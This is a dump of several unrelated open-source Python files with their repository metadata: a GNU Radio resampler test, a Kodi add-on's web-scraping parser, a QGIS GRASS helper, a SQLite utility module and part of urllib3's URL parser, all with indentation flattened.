result_data = dst.data()
tb = None
return result_data
class test_rational_resampler (gr_unittest.TestCase):
def setUp(self):
random.seed(0)
def tearDown(self):
pass
def test_000_1_to_1(self):
taps = (-4, 5)
src_data = (234, -4, 23, -56, 45, 98, -23, -7)
xr = (1186, -112, 339, -460, -167, 582)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_001_interp(self):
taps = [1, 10, 100, 1000, 10000]
src_data = (0, 2, 3, 5, 7, 11, 13, 17)
interpolation = 3
xr = (2,20,200,2003,20030,
300,3005,30050,
500,5007,50070,
700,7011,70110,
1100,11013,110130,
1300,13017,130170,
1700.0,17000.0,170000.0, 0.0)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_002_interp(self):
taps = random_floats(31)
src_data = random_floats(10000)
interpolation = 3
expected_result = reference_interp_filter(src_data, interpolation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
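# Compare only the steady-state portion, skipping the first len(taps)-1 samples of
# filter start-up transient.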
N = 1000
offset = len(taps)-1
self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
def xtest_003_interp(self):
taps = random_floats(9)
src_data = random_floats(10000)
decimation = 3
expected_result = reference_dec_filter(src_data, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 10
offset = 10  # len(taps)-1
print(expected_result[100+offset:100+offset+N])
print(result_data[100:100+N])
#self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_004_decim_random_vals(self):
MAX_TAPS = 9
MAX_DECIM = 7
OUTPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for decim in range(1, MAX_DECIM+1):
for ilen in range(ntaps + decim, ntaps + OUTPUT_LEN*decim):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_dec_filter(src_data, decim, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
if False:
sys.stderr.write('delta = %2d: ntaps = %d decim = %d ilen = %d\n' % (L2 - L1, ntaps, decim, ilen))
sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
(len(result_data), len(expected_result)))
self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_005_interp_random_vals(self):
MAX_TAPS = 9
MAX_INTERP = 7
INPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for interp in range(1, MAX_INTERP+1):
for ilen in range(ntaps, ntaps + INPUT_LEN):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_interp_filter(src_data, interp, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
#if True or abs(L1-L2) > 1:
if False:
sys.stderr.write('delta = %2d: ntaps = %d interp = %d ilen = %d\n' % (L2 - L1, ntaps, interp, ilen))
#sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
# (len(result_data), len(expected_result)))
#self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME check first ntaps+1 answers
self.assertEqual(expected_result[ntaps+1:L], result_data[ntaps+1:L])
def test_006_interp_decim(self):
taps = random_floats(31)
src_data = random_floats(10000)
interp = 3
decimation = 2
expected_result = reference_interp_dec_filter(src_data, interp, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 1000
offset = len(taps) // 2
self.assertFloatTuplesAlmostEqual(expected_result[offset:offset+N], result_data[0:N], 5)
if __name__ == '__main__':
# FIXME: Disabled, see ticket:210
gr_unittest.run(test_rational_resampler, "test_rational_resampler.xml")
|
iohannez/gnuradio
|
gr-filter/python/filter/qa_rational_resampler.py
|
Python
|
gpl-3.0
| 8,932 | 0.004478 |
# -*- coding: utf-8 -*-
import common
import sys, os, traceback
import time
import random
import re
import urllib
import string
from string import lower
from entities.CList import CList
from entities.CItemInfo import CItemInfo
from entities.CListItem import CListItem
from entities.CRuleItem import CRuleItem
import customReplacements as cr
import customConversions as cc
from utils import decryptionUtils as crypt
from utils import datetimeUtils as dt
from utils import rowbalance as rb
from utils.fileUtils import findInSubdirectory, getFileContent, getFileExtension
from utils.scrapingUtils import findVideoFrameLink, findContentRefreshLink, findRTMP, findJS, findPHP, getHostName, findEmbedPHPLink
from common import getHTML
class ParsingResult(object):
class Code:
SUCCESS = 0
CFGFILE_NOT_FOUND = 1
CFGSYNTAX_INVALID = 2
WEBREQUEST_FAILED = 3
def __init__(self, code, itemsList):
self.code = code
self.list = itemsList
self.message = None
class Parser(object):
"""
returns a list of items
"""
def parse(self, lItem):
url = lItem['url']
cfg = lItem['cfg']
ext = getFileExtension(url)
successfullyScraped = True
tmpList = None
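# A list definition can come from an explicit catcher, from a direct .cfg url,
# or from a cfg inherited via the parent item.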
if lItem['catcher']:
catcher = lItem['catcher']
cfg = os.path.join(common.Paths.catchersDir, '__' + catcher + '.cfg')
tmpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
else:
if ext == 'cfg':
tmpList = self.__loadLocal(url, lItem)
if tmpList and tmpList.start != '' and len(tmpList.rules) > 0:
lItem['url'] = tmpList.start
successfullyScraped = self.__loadRemote(tmpList, lItem)
elif cfg:
tmpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
# autoselect
if tmpList and tmpList.skill.find('autoselect') != -1 and len(tmpList.items) == 1:
m = tmpList.items[0]
m_type = m['type']
if m_type == 'rss':
common.log('Autoselect - ' + m['title'])
lItem = m
tmpList = self.parse(lItem).list
if not tmpList:
return ParsingResult(ParsingResult.Code.CFGSYNTAX_INVALID, None)
if tmpList and successfullyScraped == False:
return ParsingResult(ParsingResult.Code.WEBREQUEST_FAILED, tmpList)
# Remove duplicates
if tmpList.skill.find('allowDuplicates') == -1:
urls = []
for i in range(len(tmpList.items)-1,-1,-1):
item = tmpList.items[i]
tmpUrl = item['url']
tmpCfg = item['cfg']
if not tmpCfg:
tmpCfg = ''
if not urls.__contains__(tmpUrl + '|' + tmpCfg):
urls.append(tmpUrl + '|' + tmpCfg)
else:
tmpList.items.remove(item)
return ParsingResult(ParsingResult.Code.SUCCESS, tmpList)
"""
loads cfg, creates list and sets up rules for scraping
"""
def __loadLocal(self, filename, lItem = None):
params = []
#get Parameters
if filename.find('@') != -1:
params = filename.split('@')
filename = params.pop(0)
# get cfg file
cfg = filename
if not os.path.exists(cfg):
cfg = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(cfg):
tmpPath = os.path.dirname(os.path.join(common.Paths.modulesDir, lItem["definedIn"]))
cfg = os.path.join(tmpPath ,filename)
if not os.path.exists(cfg):
srchFilename = filename
if filename.find('/') > -1:
srchFilename = srchFilename.split('/')[1]
try:
cfg = findInSubdirectory(srchFilename, common.Paths.modulesDir)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.favouritesFolder)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.customModulesDir)
except:
common.log('File not found: ' + srchFilename)
return None
#load file and apply parameters
data = getFileContent(cfg)
data = cr.CustomReplacements().replace(os.path.dirname(cfg), data, lItem, params)
#log
msg = 'Local file ' + filename + ' opened'
if len(params) > 0:
msg += ' with Parameter(s): '
msg += ",".join(params)
common.log(msg)
outputList = self.__parseCfg(filename, data, lItem)
return outputList
"""
scrape items according to rules and add them to the list
"""
def __loadRemote(self, inputList, lItem):
try:
inputList.curr_url = lItem['url']
count = 0
i = 1
maxits = 2 # 1 optimistic + 1 demystified
ignoreCache = False
demystify = False
back = ''
startUrl = inputList.curr_url
#print inputList, lItem
while count == 0 and i <= maxits:
if i > 1:
ignoreCache = True
demystify = True
# Trivial: url is from known streamer
if back:
lItem['referer'] = back
items = self.__parseHtml(inputList.curr_url, '"' + inputList.curr_url + '"', inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
# try to find items in html source code
if count == 0:
referer = ''
if lItem['referer']:
referer = lItem['referer']
data = common.getHTML(inputList.curr_url, None, referer, False, False, ignoreCache, demystify)
if data == '':
return False
msg = 'Remote URL ' + inputList.curr_url + ' opened'
if demystify:
msg += ' (demystified)'
common.log(msg)
if inputList.section != '':
section = inputList.section
data = self.__getSection(data, section)
if lItem['section']:
section = lItem['section']
data = self.__getSection(data, section)
items = self.__parseHtml(inputList.curr_url, data, inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
common.log(' -> ' + str(count) + ' item(s) found')
# find rtmp stream
#common.log('Find rtmp stream')
if count == 0:
item = self.__findRTMP(data, startUrl, lItem)
if item:
items = []
items.append(item)
count = 1
# find embedding javascripts
#common.log('Find embedding javascripts')
if count == 0:
item = findJS(data)
if item:
firstJS = item[0]
streamId = firstJS[0]
jsUrl = firstJS[1]
if not jsUrl.startswith('http://'):
jsUrl = urllib.basejoin(startUrl,jsUrl)
streamerName = getHostName(jsUrl)
jsSource = getHTML(jsUrl, None, startUrl, True, False)
phpUrl = findPHP(jsSource, streamId)
if phpUrl:
data = getHTML(phpUrl, None, startUrl, True, True)
item = self.__findRTMP(data, phpUrl, lItem)
if item:
if streamerName:
item['title'] = item['title'].replace('RTMP', streamerName)
items = []
items.append(item)
count = 1
else:
red = phpUrl
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
continue
# find redirects
#common.log('find redirects')
if count == 0:
red = self.__findRedirect(startUrl, inputList.curr_url)
if startUrl == red:
common.log(' -> No redirect found')
else:
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
i = 0
i += 1
if count != 0:
inputList.items = inputList.items + items
except:
traceback.print_exc(file = sys.stdout)
return False
return True
def __findRTMP(self, data, pageUrl, lItem):
rtmp = findRTMP(pageUrl, data)
if rtmp:
item = CListItem()
item['title'] = 'RTMP* - ' + rtmp[1]
item['type'] = 'video'
item['url'] = rtmp[0] + ' playPath=' + rtmp[1] + ' swfUrl=' + rtmp[2] +' swfVfy=1 live=true pageUrl=' + pageUrl
item.merge(lItem)
return item
return None
def __getSection(self, data, section):
p = re.compile(section, re.IGNORECASE + re.DOTALL + re.UNICODE)
m = p.search(data)
if m:
return m.group(0)
else:
common.log(' -> Section could not be found:' + section)
return data
def __findRedirect(self, page, referer='', demystify=False):
data = common.getHTML(page, None, referer = referer, xml = False, mobile=False, demystify = demystify)
if findVideoFrameLink(page, data):
return findVideoFrameLink(page, data)
elif findContentRefreshLink(data):
return findContentRefreshLink(data)
elif findEmbedPHPLink(data):
return findEmbedPHPLink(data)
if not demystify:
return self.__findRedirect(page, referer, True)
return page
def __parseCfg(self, cfgFile, data, lItem):
tmpList = CList()
data = data.replace('\r\n', '\n').split('\n')
items = []
tmp = None
hasOwnCfg = False
for m in data:
if m and m[0] != '#':
index = m.find('=')
if index != -1:
key = lower(m[:index]).strip()
value = m[index+1:]
index = value.find('|')
if value[:index] == 'sports.devil.locale':
value = common.translate(int(value[index+1:]))
elif value[:index] == 'sports.devil.image':
value = os.path.join(common.Paths.imgDir, value[index+1:])
if key == 'start':
tmpList.start = value
elif key == 'section':
tmpList.section = value
elif key == 'sort':
tmpList.sort = value
elif key == 'skill':
tmpList.skill = value
elif key == 'catcher':
tmpList.catcher = value
elif key == 'item_infos':
rule_tmp = CRuleItem()
hasOwnCfg = False
rule_tmp.infos = value
elif key == 'item_order':
rule_tmp.order = value
elif key == 'item_skill':
rule_tmp.skill = value
elif key == 'item_curr':
rule_tmp.curr = value
elif key == 'item_precheck':
rule_tmp.precheck = value
elif key.startswith('item_info'):
tmpkey = key[len('item_info'):]
if tmpkey == '_name':
info_tmp = CItemInfo()
info_tmp.name = value
if value == 'cfg':
hasOwnCfg = True
elif tmpkey == '_from':
info_tmp.src = value
elif tmpkey == '':
info_tmp.rule = value
elif tmpkey == '_default':
info_tmp.default = value
elif tmpkey == '_convert':
info_tmp.convert.append(value)
elif tmpkey == '_build':
info_tmp.build = value
rule_tmp.info_list.append(info_tmp)
elif key == 'item_url_build':
rule_tmp.url_build = value
if tmpList.catcher != '':
refInf = CItemInfo()
refInf.name = 'referer'
refInf.build = value
rule_tmp.info_list.append(refInf)
if not hasOwnCfg:
refInf = CItemInfo()
refInf.name = 'catcher'
refInf.build = tmpList.catcher
rule_tmp.info_list.append(refInf)
tmpList.rules.append(rule_tmp)
# static menu items (without regex)
elif key == 'title':
tmp = CListItem()
tmp['title'] = value
if tmpList.skill.find('videoTitle') > -1:
tmp['videoTitle'] = value
elif key == 'url':
tmp['url'] = value
if lItem:
tmp.merge(lItem)
if tmpList.catcher != '':
tmp['referer'] = value
if not hasOwnCfg:
tmp['catcher'] = tmpList.catcher
tmp['definedIn'] = cfgFile
items.append(tmp)
tmp = None
elif tmp != None:
if key == 'cfg':
hasOwnCfg = True
tmp[key] = value
tmpList.items = items
tmpList.cfg = cfgFile
return tmpList
def __parseHtml(self, url, data, rules, skills, definedIn, lItem):
#common.log('_parseHtml called' + url)
items = []
for item_rule in rules:
#common.log('rule: ' + item_rule.infos)
if not hasattr(item_rule, 'precheck') or (item_rule.precheck in data):
revid = re.compile(item_rule.infos, re.IGNORECASE + re.DOTALL + re.MULTILINE + re.UNICODE)
for reinfos in revid.findall(data):
tmp = CListItem()
if lItem['referer']:
tmp['referer'] = lItem['referer']
if item_rule.order.find('|') != -1:
infos_names = item_rule.order.split('|')
infos_values = list(reinfos)
i = 0
for name in infos_names:
tmp[name] = infos_values[i]
i = i+1
else:
tmp[item_rule.order] = reinfos
for info in item_rule.info_list:
info_value = tmp[info.name]
if info_value:
if info.build.find('%s') != -1:
tmpVal = info.build % info_value
tmp[info.name] = tmpVal
continue
if info.build.find('%s') != -1:
if info.src.__contains__('+'):
tmpArr = info.src.split('+')
src = ''
for t in tmpArr:
t = t.strip()
if t.find('\'') != -1:
src = src + t.strip('\'')
else:
src = src + tmp[t]
elif info.src.__contains__('||'):
variables = info.src.split('||')
src = firstNonEmpty(tmp, variables)
else:
src = tmp[info.src]
if src and info.convert != []:
tmp['referer'] = url
src = self.__parseCommands(tmp, src, info.convert)
if isinstance(src, dict):
for dKey in src:
tmp[dKey] = src[dKey]
src = src.values()[0]
info_value = info.build % (src)
else:
info_value = info.build
tmp[info.name] = info_value
if tmp['url']:
tmp['url'] = item_rule.url_build % (tmp['url'])
else:
tmp['url'] = url
tmp.merge(lItem)
if item_rule.skill.find('append') != -1:
tmp['url'] = url + tmp['url']
if item_rule.skill.find('space') != -1:
tmp['title'] = ' %s ' % tmp['title'].strip()
if skills.find('videoTitle') > -1:
tmp['videoTitle'] = tmp['title']
tmp['definedIn'] = definedIn
items.append(tmp)
return items
def __parseCommands(self, item, src, convCommands):
common.log('_parseCommands called')
# helping function
def parseCommand(txt):
command = {"command": txt, "params": ""}
if txt.find("(") > -1:
command["command"] = txt[0:txt.find("(")]
command["params"] = txt[len(command["command"]) + 1:-1]
return command
for convCommand in convCommands:
pComm = parseCommand(convCommand)
command = pComm["command"]
params = pComm["params"]
if params.find('@REFERER@'):
referer = item['referer']
if not referer:
referer = ''
params = params.replace('@REFERER@', referer)
if command == 'convDate':
src = cc.convDate(params, src)
elif command == 'convTimestamp':
src = cc.convTimestamp(params, src)
elif command == 'select':
src = cc.select(params, src)
if not src:
continue
elif command == 'unicode_escape':
src = src.decode('unicode-escape')
elif command == 'replaceFromDict':
dictName = str(params.strip('\''))
path = os.path.join(common.Paths.dictsDir, dictName + '.txt')
if not (os.path.exists(path)):
common.log('Dictionary file not found: ' + path)
continue
src = cc.replaceFromDict(path, src)
elif command == 'time':
src = time.time()
elif command == 'timediff':
src = dt.timediff(src,params.strip('\''))
elif command == 'offset':
src = cc.offset(params, src)
elif command == 'getSource':
src = cc.getSource(params, src)
elif command == 'quote':
try:
src = urllib.quote(params.strip("'").replace('%s', src),'')
except:
cleanParams = params.strip("'")
cleanParams = cleanParams.replace("%s",src)
src = urllib.quote(cleanParams.encode('utf-8'),'')
elif command == 'unquote':
src = urllib.unquote(params.strip("'").replace('%s', src))
elif command == 'parseText':
src = cc.parseText(item, params, src)
elif command == 'getInfo':
src = cc.getInfo(item, params, src)
elif command == 'getXML':
src = cc.getInfo(item, params, src, xml=True)
elif command == 'getMobile':
src = cc.getInfo(item, params, src, mobile=True)
elif command == 'decodeBase64':
src = cc.decodeBase64(src)
elif command == 'decodeRawUnicode':
src = cc.decodeRawUnicode(src)
elif command == 'resolve':
src = cc.resolve(src)
elif command == 'decodeXppod':
src = cc.decodeXppod(src)
elif command == 'decodeXppodHLS':
src = cc.decodeXppod_hls(src)
elif command == 'replace':
src = cc.replace(params, src)
elif command == 'replaceRegex':
src = cc.replaceRegex(params, src)
elif command == 'ifEmpty':
src = cc.ifEmpty(item, params, src)
elif command == 'isEqual':
src = cc.isEqual(item, params, src)
elif command == 'ifFileExists':
src = cc.ifFileExists(item, params, src)
elif command == 'ifExists':
src = cc.ifExists(item, params, src)
elif command == 'encryptJimey':
src = crypt.encryptJimey(params.strip("'").replace('%s', src))
elif command == 'gAesDec':
src = crypt.gAesDec(src,item.infos[params])
elif command == 'getCookies':
src = cc.getCookies(params, src)
elif command == 'destreamer':
src = crypt.destreamer(params.strip("'").replace('%s', src))
elif command == 'unixTimestamp':
src = dt.getUnixTimestamp()
elif command == 'rowbalance':
src = rb.get()
elif command == 'urlMerge':
src = cc.urlMerge(params, src)
elif command == 'translate':
try:
src = common.translate(int(src))
except:
pass
elif command == 'camelcase':
src = string.capwords(string.capwords(src, '-'))
elif command == 'lowercase':
src = string.lower(src)
elif command == 'reverse':
src = src[::-1]
elif command == 'demystify':
print 'demystify'
src = crypt.doDemystify(src)
print 'after demystify',src
elif command == 'random':
paramArr = params.split(',')
minimum = int(paramArr[0])
maximum = int(paramArr[1])
src = str(random.randrange(minimum,maximum))
elif command == 'debug':
common.log('Debug from cfg file: ' + src)
elif command == 'divide':
paramArr = params.split(',')
a = paramArr[0].strip().strip("'").replace('%s', src)
a = resolveVariable(a, item)
b = paramArr[1].strip().strip("'").replace('%s', src)
b = resolveVariable(b, item)
if not a or not b:
continue
a = int(a)
b = int(b)
try:
src = str(a/b)
except:
pass
return src
def resolveVariable(varStr, item):
if varStr.startswith('@') and varStr.endswith('@'):
return item.getInfo(varStr.strip('@'))
return varStr
def firstNonEmpty(tmp, variables):
for v in variables:
vClean = v.strip()
if vClean.find("'") != -1:
vClean = vClean.strip("'")
else:
vClean = tmp.getInfo(vClean)
if vClean != '':
return vClean
return ''
|
Crach1015/plugin.video.superpack
|
zip/plugin.video.SportsDevil/lib/parser.py
|
Python
|
gpl-2.0
| 26,568 | 0.00478 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_mapcalc.py
------------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
if (alg.parameterAsString(parameters, 'expression', context)
and alg.parameterAsString(parameters, 'file', context)):
return False, alg.tr("You need to set either inline expression or a rules file!")
return True, None
def processInputs(alg, parameters, context, feedback):
# We will use the same raster names than in QGIS to name the rasters in GRASS
rasters = alg.parameterAsLayerList(parameters, 'maps', context)
for idx, raster in enumerate(rasters):
rasterName = os.path.splitext(
os.path.basename(raster.source()))[0]
alg.inputLayers.append(raster)
alg.setSessionProjectionFromLayer(raster)
command = 'r.in.gdal input="{0}" output="{1}" --overwrite -o'.format(
os.path.normpath(raster.source()),
rasterName)
alg.commands.append(command)
alg.removeParameter('maps')
alg.postInputs()
def processCommand(alg, parameters, context, feedback):
alg.processCommand(parameters, context, feedback, True)
def processOutputs(alg, parameters, context, feedback):
# We need to export every raster from the GRASSDB
alg.exportRasterLayersIntoDirectory('output_dir',
parameters, context,
wholeDB=True)
|
dwadler/QGIS
|
python/plugins/processing/algs/grass7/ext/r_mapcalc.py
|
Python
|
gpl-2.0
| 2,550 | 0.000786 |
# -*-coding:UTF-8 -*
import sqlite3 as sql
import json
from time import time, strftime
import settings
import logging as lgn
lgn.basicConfig(filename = '/db/db.log',level=lgn.DEBUG,\
format='%(asctime)s %(message)s')
def logit(string,*level):
if(len(level) == 0):
lgn.info(string)
else:
if(level[0] == 10):
lgn.debug(string)
elif(level[0] == 20):
lgn.info(string)
elif(level[0] == 30):
lgn.warning(string)
elif(level[0] == 40):
lgn.error(string)
else:
lgn.critical(string)
def clean_listings():
conn,c = get_conn()
#first the easy thing: let's delete all the listings that are not
#linked to any search anymore
c.execute('''delete from listings where id not in
(select listingid from search_listings)''')
conn.commit()
#now let's delete all the listings older than max age
max_age = time() - settings.n_days_before_del * 86400
c.execute('''delete from listings where date_added <= ?''',(max_age,))
conn.commit()
def get_conn():
conn = sql.connect("/db/spider_nest.db")
c = conn.cursor()
c.execute('''PRAGMA foreign_keys = ON''')
return conn,c
def add_error_listings(site,conn,c):
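# Insert a single 'NO PLUGIN AVAILABLE' placeholder listing for the site and link it
# to every search defined for that site.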
siteid = c.execute('select id from websites where url = ?',(site,)).fetchone()
searches = c.execute('select id from searches where websiteid = ?',siteid).fetchall()
try:
c.execute('''insert into listings(websiteid,desc,webid,img,url,date_added) values(
?,'NO PLUGIN AVAILABLE','NA','NA','NA',?)''',(siteid[0],time()))
except sql.IntegrityError:
logit('tried to add a no plugin available listing for {} twice. Normal behaviour.'.format(site))
#nothing fancy here, we just tried to add a no plugin available listing
#twice, since it's already there our work here is done
return
listingid = c.execute('select id from listings where websiteid = ?',siteid).fetchone()
for s in searches:
c.execute('''insert into search_listings(searchid,listingid)
values(?,?)''',(s[0],listingid[0]))
conn.commit()
|
ForgottenBeast/spider_nest
|
database/utils.py
|
Python
|
gpl-3.0
| 2,171 | 0.015661 |
import re
from typing import Container, NamedTuple, Optional, overload
from ..exceptions import LocationParseError
from .util import to_str
# We only want to normalize urls with an HTTP(S) scheme.
# urllib3 infers URLs without a scheme (None) to be http.
_NORMALIZABLE_SCHEMES = ("http", "https", None)
# Almost all of these patterns were derived from the
# 'rfc3986' module: https://github.com/python-hyper/rfc3986
_PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}")
_SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)")
_URI_RE = re.compile(
r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
r"(?://([^\\/?#]*))?"
r"([^?#]*)"
r"(?:\?([^#]*))?"
r"(?:#(.*))?$",
re.UNICODE | re.DOTALL,
)
_IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
_HEX_PAT = "[0-9A-Fa-f]{1,4}"
_LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=_HEX_PAT, ipv4=_IPV4_PAT)
_subs = {"hex": _HEX_PAT, "ls32": _LS32_PAT}
_variations = [
# 6( h16 ":" ) ls32
"(?:%(hex)s:){6}%(ls32)s",
# "::" 5( h16 ":" ) ls32
"::(?:%(hex)s:){5}%(ls32)s",
# [ h16 ] "::" 4( h16 ":" ) ls32
"(?:%(hex)s)?::(?:%(hex)s:){4}%(ls32)s",
# [ *1( h16 ":" ) h16 ] "::" 3( h16 ":" ) ls32
"(?:(?:%(hex)s:)?%(hex)s)?::(?:%(hex)s:){3}%(ls32)s",
# [ *2( h16 ":" ) h16 ] "::" 2( h16 ":" ) ls32
"(?:(?:%(hex)s:){0,2}%(hex)s)?::(?:%(hex)s:){2}%(ls32)s",
# [ *3( h16 ":" ) h16 ] "::" h16 ":" ls32
"(?:(?:%(hex)s:){0,3}%(hex)s)?::%(hex)s:%(ls32)s",
# [ *4( h16 ":" ) h16 ] "::" ls32
"(?:(?:%(hex)s:){0,4}%(hex)s)?::%(ls32)s",
# [ *5( h16 ":" ) h16 ] "::" h16
"(?:(?:%(hex)s:){0,5}%(hex)s)?::%(hex)s",
# [ *6( h16 ":" ) h16 ] "::"
"(?:(?:%(hex)s:){0,6}%(hex)s)?::",
]
_UNRESERVED_PAT = (
r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._!\-~"
)
_IPV6_PAT = "(?:" + "|".join([x % _subs for x in _variations]) + ")"
_ZONE_ID_PAT = "(?:%25|%)(?:[" + _UNRESERVED_PAT + "]|%[a-fA-F0-9]{2})+"
_IPV6_ADDRZ_PAT = r"\[" + _IPV6_PAT + r"(?:" + _ZONE_ID_PAT + r")?\]"
_REG_NAME_PAT = r"(?:[^\[\]%:/?#]|%[a-fA-F0-9]{2})*"
_TARGET_RE = re.compile(r"^(/[^?#]*)(?:\?([^#]*))?(?:#.*)?$")
_IPV4_RE = re.compile("^" + _IPV4_PAT + "$")
_IPV6_RE = re.compile("^" + _IPV6_PAT + "$")
_IPV6_ADDRZ_RE = re.compile("^" + _IPV6_ADDRZ_PAT + "$")
_BRACELESS_IPV6_ADDRZ_RE = re.compile("^" + _IPV6_ADDRZ_PAT[2:-2] + "$")
_ZONE_ID_RE = re.compile("(" + _ZONE_ID_PAT + r")\]$")
_HOST_PORT_PAT = ("^(%s|%s|%s)(?::([0-9]{0,5}))?$") % (
_REG_NAME_PAT,
_IPV4_PAT,
_IPV6_ADDRZ_PAT,
)
_HOST_PORT_RE = re.compile(_HOST_PORT_PAT, re.UNICODE | re.DOTALL)
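# Characters allowed to remain un-encoded in each URL component
# (RFC 3986 unreserved characters plus sub-delims).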
_UNRESERVED_CHARS = set(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-~"
)
_SUB_DELIM_CHARS = set("!$&'()*+,;=")
_USERINFO_CHARS = _UNRESERVED_CHARS | _SUB_DELIM_CHARS | {":"}
_PATH_CHARS = _USERINFO_CHARS | {"@", "/"}
_QUERY_CHARS = _FRAGMENT_CHARS = _PATH_CHARS | {"?"}
class Url(
NamedTuple(
"Url",
[
("scheme", Optional[str]),
("auth", Optional[str]),
("host", Optional[str]),
("port", Optional[int]),
("path", Optional[str]),
("query", Optional[str]),
("fragment", Optional[str]),
],
)
):
"""
Data structure for representing an HTTP URL. Used as a return value for
:func:`parse_url`. Both the scheme and host are normalized as they are
both case-insensitive according to RFC 3986.
"""
def __new__( # type: ignore[no-untyped-def]
cls,
scheme: Optional[str] = None,
auth: Optional[str] = None,
host: Optional[str] = None,
port: Optional[int] = None,
path: Optional[str] = None,
query: Optional[str] = None,
fragment: Optional[str] = None,
):
if path and not path.startswith("/"):
path = "/" + path
if scheme is not None:
scheme = scheme.lower()
return super().__new__(cls, scheme, auth, host, port, path, query, fragment)
@property
def hostname(self) -> Optional[str]:
"""For backwards-compatibility with urlparse. We're nice like that."""
return self.host
@property
def request_uri(self) -> str:
"""Absolute path including the query string."""
uri = self.path or "/"
if self.query is not None:
uri += "?" + self.query
return uri
@property
def authority(self) -> Optional[str]:
"""
Authority component as defined in RFC 3986 3.2.
This includes userinfo (auth), host and port.
i.e.
userinfo@host:port
"""
userinfo = self.auth
netloc = self.netloc
if netloc is None or userinfo is None:
return netloc
else:
return f"{userinfo}@{netloc}"
@property
def netloc(self) -> Optional[str]:
"""
Network location including host and port.
If you need the equivalent of urllib.parse's ``netloc``,
use the ``authority`` property instead.
"""
if self.host is None:
return None
if self.port:
return f"{self.host}:{self.port}"
return self.host
@property
def url(self) -> str:
"""
Convert self into a url
This function should more or less round-trip with :func:`.parse_url`. The
returned url may not be exactly the same as the url inputted to
:func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls
with a blank port will have : removed).
Example:
.. code-block:: python
import urllib3
U = urllib3.util.parse_url("https://google.com/mail/")
print(U.url)
# "https://google.com/mail/"
print( urllib3.util.Url("https", "username:password",
"host.com", 80, "/path", "query", "fragment"
).url
)
